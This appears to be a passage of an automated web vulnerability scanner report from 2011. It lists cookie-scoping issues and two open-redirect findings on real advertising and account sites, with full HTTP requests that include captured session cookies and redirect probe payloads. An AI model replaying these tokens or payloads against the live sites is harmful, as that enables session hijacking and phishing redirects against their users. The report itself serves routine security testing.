The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /Membership/LogOn?returnurl=%2Fmsn%2FLoggedIn HTTP/1.1 Host: secure.bundle.com Connection: keep-alive Referer: https://secure.bundle.com/msn Cache-Control: max-age=0 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=1.1303843206.1.1.utmcsr=money.msn.com|utmccn=(referral)|utmcmd=referral|utmcct=/taxes/; __utma=1.2122043951.1303843206.1303843206.1303843206.1; __utmc=1; __utmb=1.2.10.1303843206; SESSIONID=h50b1r45qzwyxs34b22hzjzc; rfr=none%7CBundle%3A%20The%20No.%201%20Source%20for%20How%20People%20Spend%20and%20Save%20Money%20--%20Personal%20Finance%20Data%2C%20Money%20Advice%2C%20Trends%2C%20News%20and%20Community%3A%20https%3A%2F%2Fsecure.bundle.com%2Fmsn
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /services/nocache/Membership/UpdateAuthenticationStateToClient HTTP/1.1 Host: secure.bundle.com Connection: keep-alive Referer: https://secure.bundle.com/msn User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=1.1303843206.1.1.utmcsr=money.msn.com|utmccn=(referral)|utmcmd=referral|utmcct=/taxes/; __utma=1.2122043951.1303843206.1303843206.1303843206.1; __utmc=1; __utmb=1.2.10.1303843206
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /accounttools/public/askUserId.do?usage=forgot HTTP/1.1 Host: www.bcbst.com Connection: keep-alive Referer: http://www.bcbst.com/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ASPSESSIONIDQQACTSCR=BEILKDCDMNMDFLDEAJBPMOCL; TLTSID=7F1898414E7D09A8923A98850107EF43; NSC_xxx.cdctu.dpn!80=ffffffff099f143645525d5f4f58455e445a4a423660; WT_FPC=id=173.193.214.243-104623456.30147664:lv=1303849513702:ss=1303849513702
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /inc/loginform.asp?t=0.3263980813790113 HTTP/1.1 Host: www.bcbst.com Connection: keep-alive Referer: https://www.bcbst.com/secure/public/login.asp User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ASPSESSIONIDQQACTSCR=BEILKDCDMNMDFLDEAJBPMOCL; TLTSID=7F1898414E7D09A8923A98850107EF43; NSC_xxx.cdctu.dpn!80=ffffffff099f143645525d5f4f58455e445a4a423660; JSESSIONID=0000l6JFMG0zkOQi8ALpYNU9n7W:148u7ts85; NSC_xxx.cdctu.dpn!443=ffffffff099f143645525d5f4f58455e445a4a42378b; Calling_URL=https://www.bcbst.com:443/accounttools/; WT_FPC=id=173.193.214.243-104623456.30147664:lv=1303849577495:ss=1303849513702
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /secure/public/login.asp HTTP/1.1 Host: www.bcbst.com Connection: keep-alive Referer: https://www.bcbst.com/secure/public/InvalidAccess.shtm User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ASPSESSIONIDQQACTSCR=BEILKDCDMNMDFLDEAJBPMOCL; TLTSID=7F1898414E7D09A8923A98850107EF43; NSC_xxx.cdctu.dpn!80=ffffffff099f143645525d5f4f58455e445a4a423660; JSESSIONID=0000l6JFMG0zkOQi8ALpYNU9n7W:148u7ts85; NSC_xxx.cdctu.dpn!443=ffffffff099f143645525d5f4f58455e445a4a42378b; Calling_URL=https://www.bcbst.com:443/accounttools/; WT_FPC=id=173.193.214.243-104623456.30147664:lv=1303849577495:ss=1303849513702
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /FusionVM/ HTTP/1.1 Host: www.fusionvm.com Connection: keep-alive Referer: http://www.criticalwatch.com/vulnerability-management.aspx User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=61526075.1303736107.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=61526075.1350494952.1303736107.1303736107.1303736107.1; ASPSESSIONIDQSSATBSQ=OACBHAADIBHEEHNBJFIKBAHA
<html><head><title>Object moved</title></head><body> <h2>Object moved to <a href="https://www.fusionvm.com/FusionVM/DesktopDefault.aspx">here</a>.</h2> </body></html>
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head id="ctl00_Head1"><meta c ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head id="ctl00_Head1"><meta c ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
<html><head><title>Object moved</title></head><body> <h2>Object moved to <a href="https://west.thomson.com/store/secure/ShippingInfo.aspx?CartEventsAndParams=scAdd%3a+22061301%3b&CartContents=220 ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /accounttools/ HTTP/1.1 Host: www.bcbst.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ASPSESSIONIDQQACTSCR=BEILKDCDMNMDFLDEAJBPMOCL; TLTSID=7F1898414E7D09A8923A98850107EF43; NSC_xxx.cdctu.dpn!80=ffffffff099f143645525d5f4f58455e445a4a423660; JSESSIONID=0000l6JFMG0zkOQi8ALpYNU9n7W:148u7ts85; NSC_xxx.cdctu.dpn!443=ffffffff099f143645525d5f4f58455e445a4a42378b; WT_FPC=id=173.193.214.243-104623456.30147664:lv=1303849539512:ss=1303849513702
<a class="cstmBtnText" href="https://secure2.convio.net/aac/site/Donation2?df_id=2184&PROXY_ID=24880&PROXY_TYPE=22&FR_ID=1110&JServSessionIdr004=839fd626r1.app209a">Support Team Freddie Mercury!</a> ...[SNIP]... </dl>
<a href="https://secure2.convio.net/aac/site/Donation2?df_id=2184&PROXY_ID=24880&PROXY_TYPE=22&FR_ID=1110&JServSessionIdr004=839fd626r1.app209a" title="Make a gift to support Team Freddie Mercury"> Make a gift! </a> ...[SNIP]...
The value of the r request parameter is used to perform an HTTP redirect. The payload http%3a//a553a9843e836a584/a%3f was submitted in the r parameter. This caused a redirection to the following URL:
http://a553a9843e836a584/a?
Request
GET /a/bpix?adv=652&id=1561&format=image&r=http%3a//a553a9843e836a584/a%3f HTTP/1.1 Host: ad.trafficmp.com Proxy-Connection: keep-alive Referer: http://pixel.fetchback.com/serve/fb/pdc?cat=&name=landing&sid=3306 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: uid2=470fb0bcf-3fea-4322-beeb-57f5828c5936-gmr873a3; T_1yvt=jxb%3Aafuq%3A1; rth=2-ljzkpb-jxb~afuq~1~1-eo7~861h~1~1-dlx~6ot5~1~1-7p9~0~1~1-
The value of the ReturnUrl request parameter is used to perform an HTTP redirect. The payload http%3a//a1a5b9bd6bfb8fd5d/a%3fhttps%3a//myaccount.west.thomson.com/MyAccount/AccessControl/AccessControl/SignIn%3fReturnUrl%3dhttp%3a//myaccount.west.thomson.com/MYACCOUNT/default.aspx%3fReturnUrl%3d/MyAccount/Common/Landing/MyAccountLanding%3fpromcode%3d571424%26sauth%3dwest_thomson_com%26xauth%3dseamless%26promcode%3d571424%26sauth%3dwest_thomson_com%26xauth%3dseamless was submitted in the ReturnUrl parameter. This caused a redirection to the following URL:
<html><head><title>Object moved</title></head><body> <h2>Object moved to <a href="http://a1a5b9bd6bfb8fd5d/a?https://myaccount.west.thomson.com/MyAccount/AccessControl/AccessControl/SignIn?ReturnUrl= ...[SNIP]...
13. Cookie scoped to parent domainpreviousnext There are 108 instances of this issue:
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /services/nocache/Membership/UpdateAuthenticationStateToClient HTTP/1.1 Host: secure.bundle.com Connection: keep-alive Referer: https://secure.bundle.com/msn User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=1.1303843206.1.1.utmcsr=money.msn.com|utmccn=(referral)|utmcmd=referral|utmcct=/taxes/; __utma=1.2122043951.1303843206.1303843206.1303843206.1; __utmc=1; __utmb=1.2.10.1303843206
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /news/security/3276305/oracle-responds-to-hacker-group-and-patches-javacom-vulnerability/?olo=rss HTTP/1.1 Host: www.computerworlduk.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /mm//PHOE//lpg?nm=LandngPg&s0=&s1=&s2=&v0=&v1=&v2=&ri=[RandomNumber] HTTP/1.1 Host: action.mathtag.com Proxy-Connection: keep-alive Referer: http://fls.doubleclick.net/activityi;src=1676624;type=count339;cat=landi852;u2=14610_0957_9_95;u4=38954353;u5=;u6=;u7=;ord=1;num=485052303411.0665? User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: uuid=4dab7d35-b1d2-915a-d3c0-9d57f9c66b07; mt_mop=9:1303494339|3:1303506763|2:1303506773|5:1303494463|10001:1303152836|1:1303494357; ts=1303851733
Response
HTTP/1.1 200 OK Server: mt2/2.0.17.4.1542 Apr 2 2011 16:34:52 ewr-pixel-n1a pid 0x6299 25241 Content-Type: image/gif P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA" Date: Tue, 26 Apr 2011 21:02:15 GMT Etag: 4dab7d35-b1d2-915a-d3c0-9d57f9c66b07 Set-Cookie: ts=1303851735; domain=.mathtag.com; path=/; expires=Wed, 25-Apr-2012 21:02:15 GMT Content-Length: 43 Accept-Ranges: bytes Cache-Control: no-store Pragma: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT Connection: Keep-Alive
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /click%3Bh%3Dv8/3af5/17/be/%2a/c%3B232789996%3B3-0%3B0%3B56669790%3B3454-728/90%3B38954353/38972110/2%3B%3B~sscs%3D%3fhttp://www.aptm.phoenix.edu/?creative_desc=20DR_Button_Orange_728x90_F9_Tag_swf&provider=MSN&keyword=msn_careers_728x90_425006&user3=1&unit=dir&channel=banr&initiative=gen&mktg_prog=gen&placement=dsply&version=728x90&classification=dir_dsply&destination=aptm&distribution=plcmt_targ&user1=cpm&user2=dr&creative_id=38954353&pvp_campaign=14610_0957_9_95&cm_mmc=dir-_-banr-_-MSN-_-gen&cm_mmca1=gen&cm_mmca2=dsply&cm_mmca3=38954353&cm_mmca4=20DR_Button_Orange_728x90_F9_Tag_swf&cm_mmca5=728x90&cm_mmca6=dir_dsply&cm_mmca7=msn_careers_728x90_425006&cm_mmca8=aptm&cm_mmca9=plcmt_targ&cm_mmca11=cpm&cm_mmca12=dr&cm_mmca13=1 HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://s0.2mdn.net/1676624/20DR_Button_Orange_728x90_F9_Tag.swf User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u
Response
HTTP/1.1 302 Moved Temporarily Content-Length: 0 Location: http://www.aptm.phoenix.edu/?creative_desc=20DR_Button_Orange_728x90_F9_Tag_swf&provider=MSN&keyword=msn_careers_728x90_425006&user3=1&unit=dir&channel=banr&initiative=gen&mktg_prog=gen&placement=dsply&version=728x90&classification=dir_dsply&destination=aptm&distribution=plcmt_targ&user1=cpm&user2=dr&creative_id=38954353&pvp_campaign=14610_0957_9_95&cm_mmc=dir-_-banr-_-MSN-_-gen&cm_mmca1=gen&cm_mmca2=dsply&cm_mmca3=38954353&cm_mmca4=20DR_Button_Orange_728x90_F9_Tag_swf&cm_mmca5=728x90&cm_mmca6=dir_dsply&cm_mmca7=msn_careers_728x90_425006&cm_mmca8=aptm&cm_mmca9=plcmt_targ&cm_mmca11=cpm&cm_mmca12=dr&cm_mmca13=1 Set-Cookie: id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; path=/; domain=.doubleclick.net; expires=Tue, 16 Apr 2013 20:37:40 GMT P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Date: Tue, 26 Apr 2011 18:45:00 GMT Server: GFE/2.0 Content-Type: text/html
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /a/bpix?adv=652&id=1561&format=image&r= HTTP/1.1 Host: ad.trafficmp.com Proxy-Connection: keep-alive Referer: http://pixel.fetchback.com/serve/fb/pdc?cat=&name=landing&sid=3306 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: uid2=470fb0bcf-3fea-4322-beeb-57f5828c5936-gmr873a3; T_1yvt=jxb%3Aafuq%3A1; rth=2-ljzkpb-jxb~afuq~1~1-eo7~861h~1~1-dlx~6ot5~1~1-7p9~0~1~1-
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /a/bpix?adv=652&id=1561&format=image&r= HTTP/1.1 Host: ad.trafficmp.com Proxy-Connection: keep-alive Referer: http://pixel.fetchback.com/serve/fb/pdc?cat=&name=landing&sid=3306 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: uid2=470fb0bcf-3fea-4322-beeb-57f5828c5936-gmr873a3; T_9j36=jxb%3Aaftr%3A1; rth=2-ljzkpb-jxb~aftr~1~1-eo7~861h~1~1-dlx~6ot5~1~1-7p9~0~1~1-
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /a/bpix?adv=652&id=1561&format=image&r= HTTP/1.1 Host: ad.trafficmp.com Proxy-Connection: keep-alive Referer: http://pixel.fetchback.com/serve/fb/pdc?cat=&name=landing&sid=3306 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: uid2=470fb0bcf-3fea-4322-beeb-57f5828c5936-gmr873a3; T_2o6=jxb%3Aag84%3A1; rth=2-ljzkpb-jxb~ag84~1~1-eo7~861h~1~1-dlx~6ot5~1~1-7p9~0~1~1-
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /a/bpix?adv=652&id=1561&format=image&r= HTTP/1.1 Host: ad.trafficmp.com Proxy-Connection: keep-alive Referer: http://pixel.fetchback.com/serve/fb/pdc?cat=&name=landing&sid=3306 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: uid2=470fb0bcf-3fea-4322-beeb-57f5828c5936-gmr873a3; T_6mee=jxb%3Aaf0m%3A1; T_47z9=jxb%3Aaf0m%3A1; rth=2-ljzkpb-jxb~af0m~1~1-eo7~861h~1~1-dlx~6ot5~1~1-7p9~0~1~1-
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /a/bpix?adv=652&id=1561&format=image&r= HTTP/1.1 Host: ad.trafficmp.com Proxy-Connection: keep-alive Referer: http://pixel.fetchback.com/serve/fb/pdc?cat=&name=landing&sid=3306&browse_products=160547 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: uid2=470fb0bcf-3fea-4322-beeb-57f5828c5936-gmr873a3; T_eel0=eo7%3A861h%3A1; rth=2-ljzkpb-eo7~861h~1~1-dlx~6ot5~1~1-7p9~0~1~1-
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /a/bpix?adv=652&id=1561&format=image&r= HTTP/1.1 Host: ad.trafficmp.com Proxy-Connection: keep-alive Referer: http://pixel.fetchback.com/serve/fb/pdc?cat=&name=landing&sid=3306 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: uid2=470fb0bcf-3fea-4322-beeb-57f5828c5936-gmr873a3; T_fk5h=jxb%3Aaf0c%3A1; rth=2-ljzkpb-jxb~af0c~1~1-eo7~861h~1~1-dlx~6ot5~1~1-7p9~0~1~1-
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /a/bpix?adv=652&id=1561&format=image&r= HTTP/1.1 Host: ad.trafficmp.com Proxy-Connection: keep-alive Referer: http://pixel.fetchback.com/serve/fb/pdc?cat=&name=landing&sid=3306 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: uid2=470fb0bcf-3fea-4322-beeb-57f5828c5936-gmr873a3; T_fk5h=jxb%3Aaf0c%3A1; rth=2-ljzkpb-jxb~af0c~1~1-eo7~861h~1~1-dlx~6ot5~1~1-7p9~0~1~1-
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /mapuid?member=181&user=CAESEAYDROJIBlXAxjjwOAYYXzI&cver=1 HTTP/1.1 Host: adx.adnxs.com Proxy-Connection: keep-alive Referer: http://mediacdn.disqus.com/1303851120/build/system/def.html User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: icu=ChIImdYCEAoYASABKAEw2qLc7QQQ2qLc7QQYAA..; sess=1; uuid2=2724386019227846218; anj=Kfu=8fG10Qgj[2<?0P(*AuB-u**g1:XICajEhzW()U9M1kUGf3$2.f0R>9.aclgdU%p3G.wsgA#5B^/y'*AHKwd-Wc/<vf>ixo=/N^ErmW.7[DPyOU^$+=btOVCb1#5mb1HtSskQ$#DX%p1anmQi))(EM:>@>i%8Erm#VQ=y1kR1I/m[-YAD8)MvNO9-KB/M=Ph3Gg0XnXoLwvH(1F$*vhmR$21+4gnIPa8ZQ96*JoaM`+tGx4)P'kOBSQ:TDf>[)JB]jN^AZA:`:L7xDM@.[obo(c'Vh#EyvU0In#NhZm]%(05D.!:agr)t[VjlG[PhG1CflaNaIM'U.!TFd(icoIMFD8Ep.IUtn=Zi@9>+M68OhQI0Z*^@!9d[@Qn^sMS^=3<0=o1N6p(m049Jmn`V9t>QhMj!HjDiz3g9e?Iibma^P.CI!sni1i^r+(]67Kw%hg9mr`R>z1NK)67z`.JhV2MJzq$a4wGN/ABy=5j2Xne?bDXi/Su11aLdm/AGUaZ#ErKYEsY^e1(Fc?>]=o<'':M4=2#H)DhRCw#R0T!2U@I</wZn
Response
HTTP/1.1 200 OK Cache-Control: no-store, no-cache, private Pragma: no-cache Expires: Sat, 15 Nov 2008 16:00:00 GMT P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC" Set-Cookie: sess=1; path=/; expires=Wed, 27-Apr-2011 21:51:18 GMT; domain=.adnxs.com; HttpOnly Set-Cookie: uuid2=2724386019227846218; path=/; expires=Mon, 25-Jul-2011 21:51:18 GMT; domain=.adnxs.com; HttpOnly Set-Cookie: uuid2=2724386019227846218; path=/; expires=Mon, 25-Jul-2011 21:51:18 GMT; domain=.adnxs.com; HttpOnly Set-Cookie: uuid2=2724386019227846218; path=/; expires=Mon, 25-Jul-2011 21:51:18 GMT; domain=.adnxs.com; HttpOnly Set-Cookie: anj=Kfu=8fG10Qgj[2<?0P(*AuB-u**g1:XICajEhzW()U9M1kUGf3$2.f0R>9.aclgdU%p3G.wsgA#5B^/y'*AHKwd-Wc/<vf>ixo=/N^ErmW.7[DPyOU^$+=btOVCb1#5mb1HtSskQ$#DX%p1anmQi))(EM:>@>i%8Erm#VQ=y1kR1I/m[-YAD8)MvNO9-KB/M=Ph3Gg0XnXoLwvH(1F$*vhmR$21+4gnIPa8ZQ96*JoaM`+tGx4)P'kOBSQ:TDf>[)JB]jN^AZA:`:L7xDM@.[obo(c'Vh#EyvU0In#NhZm]%(05D.!:agr)t[VjlG[PhG1CflaNaIM'U.!TFd(icoIMFD8Ep.IUtn=Zi@9>+M68OhQI0Z*^@!9d[@Qn^sMS^=3<0=o1N6p(m049Jmn`V9t>QhMj!HjDiz3g9e?Iibma^P.CI!sni1i^r+(]67Kw%hg9mr`R>z1NK)67z`.JhV2MJzq$a4wGN/ABy=5j2Xne?bDXi/Su11aLdm/AGUaZ#ErKYEsY^e1(Fc?>]=o<'':M4=2#H)DhRCw#R0T!2U@I</wZn; path=/; expires=Mon, 25-Jul-2011 21:51:18 GMT; domain=.adnxs.com; HttpOnly Content-Length: 43 Content-Type: image/gif Date: Tue, 26 Apr 2011 21:51:18 GMT
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /ad/js/15902-126860-34879-0?mpt=4926950&mpvc=http://ad.uk.doubleclick.net/click%3Bh%3Dv8/3af5/3/0/%2a/u%3B240165093%3B0-0%3B0%3B50681866%3B4252-336/280%3B41773561/41791348/1%3B%3B%7Esscs%3D%3f HTTP/1.1 Host: altfarm.mediaplex.com Proxy-Connection: keep-alive Referer: http://www.computerworlduk.com/news/security/3276305/oracle-responds-to-hacker-group-and-patches-javacom-vulnerability/?olo=rss User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: svid=822523287793; mojo2=16228:26209; mojo3=10105:2060/14302:29115/12309:6712/17404:9432/1551:17349/3484:15222/15017:28408/16228:26209
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
